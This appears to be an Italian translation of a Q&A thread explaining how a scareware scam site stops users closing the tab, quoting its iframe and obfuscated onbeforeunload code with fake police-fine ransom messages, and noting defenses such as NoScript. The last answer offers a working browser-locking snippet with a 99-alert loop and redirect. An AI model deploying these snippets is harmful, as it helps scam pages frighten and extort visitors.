Sito che impedisce all'utente di chiudere la scheda / chiude il browser

Aggiornamento: questo non è più un problema per Firefox (29+) e Chrome (versione? Non sono sicuro che ci sia mai stato un problema lì). Firefox visualizzerà ora una sola finestra di dialogo.

Firefox 31 rende inoltre la finestra di dialogo non modale e chiuderà la finestra anche se premi il pulsante Chiudi una seconda volta.

Sfortunatamente, IE11 mostra ancora più dialoghi. Non sono sicuro che Microsoft sia a conoscenza di questo problema.

Il metodo è piuttosto semplice, in realtà. Se ispezionerai la fonte, vedrai molte ripetizioni di questa riga:

<iframe test="test" srcdoc="<script> window.onbeforeunload=function(env){ return 'YОUR BRОWSЕR HAS BЕЕN LОCKЕD. АLL PC DАTА WILL BЕ DЕTАINЕD АND CRIMINАL PRОCЕDURЕS WILL BЕ INITIАTЕD АGАINST YОU IF THЕ FINЕ WILL NОT BЕ PАID.';} </script>" src="au/close.php"></iframe>

Fondamentalmente, hanno un intero gruppo di iframe e ogni iframe può far scattare il messaggio 'sei sicuro di voler lasciare' una volta. Non è infinito in alcun modo (come ha detto Braiam, puoi semplicemente tenere premuto invio nella pagina di partenza), ma probabilmente è abbastanza per ingannare alcune persone.

Questo si potrebbe comportare come previsto, anche se potrebbe essere meglio aggiungere una di quelle caselle "non mostrare più", proprio come fanno per alert popup.

Un altro modo per prevenire questo tipo di cose è disabilitare JavaScript nei siti di cui non ti fidi. NoScript funziona bene. Questo può, tuttavia, essere un po 'fastidioso e / o interrompere i siti, a volte.

Per gli interessati: Chrome visualizza effettivamente una lunga finestra di dialogo. Questo ha i suoi problemi - e questo è un bug del browser - i pulsanti vengono espulsi dal fondo della pagina (succede con un popup di Chrome troppo lungo). Puoi ancora premere invio . La finestra di dialogo di Chrome sembra essere iniziata da un diverso alert popup, e in realtà non sembra mostrare il testo di scarico dell'iframe a tutti - è probabile che lo abbiano aggiunto appositamente per intercettare gli utenti di Chrome:

<script type="text/javascript">window.onbeforeunload = function(env){var str = '\n\nUw br' + 'оws' + 'еr is gе' + 'blо' + 'kkе' + 'еrd.\n\nAl' + 'le P' + 'C dа' + 'tа zu' + 'lle' + 'n wо' + 'rde' + 'n vа' + 'stgе' + 'hou' + 'den e' + 'n st' + 'rаf' + 'rес' + 'htе' + 'li' + 'jk' + 'е pr' + 'ocе' + 'dur' + 'es zu' + 'lle' + 'n wо' + 'rd' + 'en ing' + 'еlе' + 'id te' + 'ge' + 'n u al' + 's d' + 'e bo' + 'еt' + 'е ni' + 'et wo' + 'rd' + 't be' + 'taa' + 'ld.\n\n';
        alert(str);
    return str;
}
</script>

Ancora una volta, non è altro che un pauroso popup che sembra impossibile da eliminare. Dannoso? Sì. Davvero pericoloso? Non proprio. Finché non cadi per la truffa.

Un altro potenziale interesse è che fanno mostra il tuo IP pubblico e la tua posizione approssimativa. Questa è una tattica di spavento piuttosto normale su questi siti di truffa e in realtà non è nulla di speciale: il qualsiasi sito a cui connettersi può ottenere il tuo IP pubblico e i database GeoIP pubblici di solito forniscono la posizione approssimativa. Se sei davvero preoccupato, vai a prendere un VPN o un proxy anonimo per connetterti.

Puoi andare con il ciclo di allerta e creare una funzione chiamata sul corpo Ho aggiunto molti eventi sul corpo.

Qui puoi trovare un esempio funzionante di questo.

<script>
  var errormessage_text = "***System Alert***";
  var redirect_url = window.location;
</script></code>
<body onload="myFunction();" onmouseover="myFunction();" onclick="myFunction();" onkeydown="myFunction();" onunload="myFunction();">
<script>
    window.onbeforeunload=function(){
    window.location.href=redirect_url,'_blank';
    return errormessage_text;
  };
 for(i=0;i<99;i++){alert(errormessage_text);}<//script>